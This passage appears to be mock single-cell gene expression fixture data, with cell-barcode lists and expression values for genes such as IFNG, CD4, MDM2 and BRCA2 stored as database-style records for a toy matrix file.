"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IFNG Expression": {
"name": "IFNG Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
3.0,
1.0,
2.81,
2.0,
1.58,
2.32,
3.0,
1.0,
2.58,
2.0,
1.0,
1.58,
2.58,
2.58,
2.58,
1.0,
2.32,
1.0,
2.32,
1.58,
3.0,
1.0,
1.0,
2.32,
1.0,
2.81,
2.58,
2.81,
2.81,
2.32,
1.58,
2.81,
1.0,
3.0,
3.0,
2.81,
2.81,
1.0,
2.81,
1.0,
2.81,
2.0,
2.81,
2.0,
3.0,
2.58,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CD4 Cells": {
"name": "CD4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CD4 Expression": {
"name": "CD4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.58,
2.0,
2.0,
1.0,
2.32,
2.0,
2.81,
2.32,
2.0,
2.32,
2.81,
3.0,
1.0,
2.32,
1.0,
2.32,
2.0,
2.0,
2.58,
2.32,
2.58,
1.0,
1.58,
2.58,
3.0,
1.0,
2.58,
1.0,
2.0,
2.0,
2.58,
2.58,
2.81,
1.58,
3.0,
3.0,
3.0,
2.32,
1.0,
1.0,
3.0,
3.0,
1.58,
1.58,
2.32,
2.58,
2.58,
2.32,
1.58,
2.0,
1.0,
1.0,
2.81,
2.32,
1.0,
1.58,
2.81,
1.58,
1.0,
3.0,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MDM2 Cells": {
"name": "MDM2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MDM2 Expression": {
"name": "MDM2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
1.58,
1.58,
1.58,
3.0,
1.58,
2.81,
3.0,
2.81,
2.81,
1.0,
3.0,
2.32,
2.58,
2.58,
1.0,
3.0,
2.81,
2.32,
2.32,
1.58,
2.58,
2.58,
3.0,
2.32,
2.0,
2.0,
3.0,
2.32,
2.81,
2.58,
2.58,
3.0,
1.0,
2.32,
2.81,
3.0,
3.0,
3.0,
3.0,
2.58,
1.58,
3.0,
1.0,
3.0,
2.58,
2.0,
2.32,
2.0,
2.81,
2.58,
2.58,
2.58,
2.81,
2.0,
3.0,
2.32,
2.32,
1.0,
2.58,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"JAK2 Cells": {
"name": "JAK2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"JAK2 Expression": {
"name": "JAK2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.58,
2.81,
2.81,
2.0,
2.32,
1.0,
2.0,
3.0,
1.58,
2.58,
2.0,
2.58,
1.0,
2.81,
2.0,
2.81,
2.58,
1.0,
3.0,
2.81,
1.58,
2.58,
3.0,
2.58,
3.0,
2.58,
1.58,
1.58,
1.0,
3.0,
2.0,
2.0,
2.81,
1.58,
2.0,
2.58,
1.0,
3.0,
1.0,
1.58,
3.0,
3.0,
2.58,
2.32,
1.0,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRCA2 Cells": {
"name": "BRCA2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRCA2 Expression": {
"name": "BRCA2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.0,
2.0,
2.0,
2.58,
3.0,
3.0,
2.81,
1.58,
2.32,
1.58,
3.0,
2.0,
2.0,
2.0,
1.0,
1.0,
2.81,
2.81,
2.32,
2.58,
3.0,
1.0,
2.32,
2.81,
1.58,
1.0,
2.58,
2.81,
2.58,
2.0,
3.0,
1.0,
3.0,
2.81,
2.81,
2.0,
3.0,
2.58,
3.0,
2.32,
3.0,
1.58,
2.32,
2.81,
2.32,
1.0,
3.0,
2.0,
2.0,
2.0,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MMP2 Cells": {
"name": "MMP2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MMP2 Expression": {
"name": "MMP2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.0,
2.58,
2.0,
2.81,
2.32,
3.0,
2.58,
1.0,
2.0,
1.58,
2.58,
1.0,
2.58,
1.58,
1.0,
2.32,
1.58,
1.58,
2.32,
1.58,
3.0,
1.58,
2.81,
1.58,
2.0,
3.0,
2.32,
1.0,
3.0,
2.0,
3.0,
1.58,
2.58,
1.58,
3.0,
2.81,
1.58,
2.0,
1.0,
3.0,
1.58,
2.32,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MAPK1 Cells": {
"name": "MAPK1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
